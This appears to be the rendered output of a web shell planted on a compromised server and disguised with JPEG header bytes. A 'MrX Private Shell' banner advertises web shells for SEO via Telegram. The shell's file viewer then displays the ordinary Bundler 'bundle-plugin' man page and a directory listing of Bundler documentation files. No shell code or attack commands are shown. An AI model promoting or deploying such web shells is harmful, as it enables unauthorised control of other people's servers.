����JFIF���������
__ __ __ __ _____ _ _ _____ _ _ _ | \/ | \ \ / / | __ \ (_) | | / ____| | | | | | \ / |_ __\ V / | |__) | __ ___ ____ _| |_ ___ | (___ | |__ ___| | | | |\/| | '__|> < | ___/ '__| \ \ / / _` | __/ _ \ \___ \| '_ \ / _ \ | | | | | | |_ / . \ | | | | | |\ V / (_| | || __/ ____) | | | | __/ | | |_| |_|_(_)_/ \_\ |_| |_| |_| \_/ \__,_|\__\___| |_____/|_| |_|\___V 2.1 if you need WebShell for Seo everyday contact me on Telegram Telegram Address : @jackleetFor_More_Tools:
bundle-plugin(1) -- Manage Bundler plugins
==========================================
## SYNOPSIS
`bundle plugin` install PLUGINS [--source=SOURCE] [--version=VERSION]
[--git=GIT] [--branch=BRANCH|--ref=REF]
[--path=PATH]<br>
`bundle plugin` uninstall PLUGINS [--all]<br>
`bundle plugin` list<br>
`bundle plugin` help [COMMAND]
## DESCRIPTION
You can install, uninstall, and list plugin(s) with this command to extend functionalities of Bundler.
## SUB-COMMANDS
### install
Install the given plugin(s).
For example, `bundle plugin install bundler-graph` will install bundler-graph
gem from globally configured sources (defaults to RubyGems.org). Note that the
global source specified in Gemfile is ignored.
**OPTIONS**
* `--source=SOURCE`:
Install the plugin gem from a specific source, rather than from globally configured sources.
Example: `bundle plugin install bundler-graph --source https://example.com`
* `--version=VERSION`:
Specify a version of the plugin gem to install via `--version`.
Example: `bundle plugin install bundler-graph --version 0.2.1`
* `--git=GIT`:
Install the plugin gem from a Git repository. You can use standard Git URLs like:
`ssh://[user@]host.xz[:port]/path/to/repo.git`<br>
`http[s]://host.xz[:port]/path/to/repo.git`<br>
`/path/to/repo`<br>
`file:///path/to/repo`
Example: `bundle plugin install bundler-graph --git https://github.com/rubygems/bundler-graph`
* `--branch=BRANCH`:
When you specify `--git`, you can use `--branch` to use.
* `--ref=REF`:
When you specify `--git`, you can use `--ref` to specify any tag, or commit
hash (revision) to use.
* `--path=PATH`:
Install the plugin gem from a local path.
Example: `bundle plugin install bundler-graph --path ../bundler-graph`
### uninstall
Uninstall the plugin(s) specified in PLUGINS.
**OPTIONS**
* `--all`:
Uninstall all the installed plugins. If no plugin is installed, then it does nothing.
### list
List the installed plugins and available commands.
No options.
### help
Describe subcommands or one specific subcommand.
No options.
## SEE ALSO
* [How to write a Bundler plugin](https://bundler.io/guides/bundler_plugins.html)
| Name | Type | Size | Permission | Actions |
|---|---|---|---|---|
| bundle-add.1 | File | 2.79 KB | 0644 |
|
| bundle-add.1.ronn | File | 2.47 KB | 0644 |
|
| bundle-binstubs.1 | File | 1.55 KB | 0644 |
|
| bundle-binstubs.1.ronn | File | 1.39 KB | 0644 |
|
| bundle-cache.1 | File | 3.74 KB | 0644 |
|
| bundle-cache.1.ronn | File | 3.38 KB | 0644 |
|
| bundle-check.1 | File | 906 B | 0644 |
|
| bundle-check.1.ronn | File | 812 B | 0644 |
|
| bundle-clean.1 | File | 726 B | 0644 |
|
| bundle-clean.1.ronn | File | 624 B | 0644 |
|
| bundle-config.1 | File | 20.9 KB | 0644 |
|
| bundle-config.1.ronn | File | 19.37 KB | 0644 |
|
| bundle-console.1 | File | 1.43 KB | 0644 |
|
| bundle-console.1.ronn | File | 1.23 KB | 0644 |
|
| bundle-doctor.1 | File | 2.59 KB | 0644 |
|
| bundle-doctor.1.ronn | File | 2.36 KB | 0644 |
|
| bundle-env.1 | File | 338 B | 0644 |
|
| bundle-env.1.ronn | File | 275 B | 0644 |
|
| bundle-exec.1 | File | 6.36 KB | 0644 |
|
| bundle-exec.1.ronn | File | 5.76 KB | 0644 |
|
| bundle-fund.1 | File | 622 B | 0644 |
|
| bundle-fund.1.ronn | File | 528 B | 0644 |
|
| bundle-gem.1 | File | 6.31 KB | 0644 |
|
| bundle-gem.1.ronn | File | 5.77 KB | 0644 |
|
| bundle-help.1 | File | 448 B | 0644 |
|
| bundle-help.1.ronn | File | 349 B | 0644 |
|
| bundle-info.1 | File | 524 B | 0644 |
|
| bundle-info.1.ronn | File | 460 B | 0644 |
|
| bundle-init.1 | File | 1.14 KB | 0644 |
|
| bundle-init.1.ronn | File | 1.01 KB | 0644 |
|
| bundle-install.1 | File | 13 KB | 0644 |
|
| bundle-install.1.ronn | File | 12.41 KB | 0644 |
|
| bundle-issue.1 | File | 1.27 KB | 0644 |
|
| bundle-issue.1.ronn | File | 1.03 KB | 0644 |
|
| bundle-licenses.1 | File | 311 B | 0644 |
|
| bundle-licenses.1.ronn | File | 227 B | 0644 |
|
| bundle-list.1 | File | 1.03 KB | 0644 |
|
| bundle-list.1.ronn | File | 870 B | 0644 |
|
| bundle-lock.1 | File | 3.65 KB | 0644 |
|
| bundle-lock.1.ronn | File | 3.57 KB | 0644 |
|
| bundle-open.1 | File | 797 B | 0644 |
|
| bundle-open.1.ronn | File | 646 B | 0644 |
|
| bundle-outdated.1 | File | 3.4 KB | 0644 |
|
| bundle-outdated.1.ronn | File | 3.28 KB | 0644 |
|
| bundle-platform.1 | File | 1.39 KB | 0644 |
|
| bundle-platform.1.ronn | File | 1.21 KB | 0644 |
|
| bundle-plugin.1 | File | 2.44 KB | 0644 |
|
| bundle-plugin.1.ronn | File | 2.19 KB | 0644 |
|
| bundle-pristine.1 | File | 1.62 KB | 0644 |
|
| bundle-pristine.1.ronn | File | 1.45 KB | 0644 |
|
| bundle-remove.1 | File | 544 B | 0644 |
|
| bundle-remove.1.ronn | File | 433 B | 0644 |
|
| bundle-show.1 | File | 677 B | 0644 |
|
| bundle-show.1.ronn | File | 596 B | 0644 |
|
| bundle-update.1 | File | 13.62 KB | 0644 |
|
| bundle-update.1.ronn | File | 12.79 KB | 0644 |
|
| bundle-version.1 | File | 618 B | 0644 |
|
| bundle-version.1.ronn | File | 473 B | 0644 |
|
| bundle.1 | File | 3.44 KB | 0644 |
|
| bundle.1.ronn | File | 3.09 KB | 0644 |
|
| gemfile.5 | File | 24.04 KB | 0644 |
|
| gemfile.5.ronn | File | 22.29 KB | 0644 |
|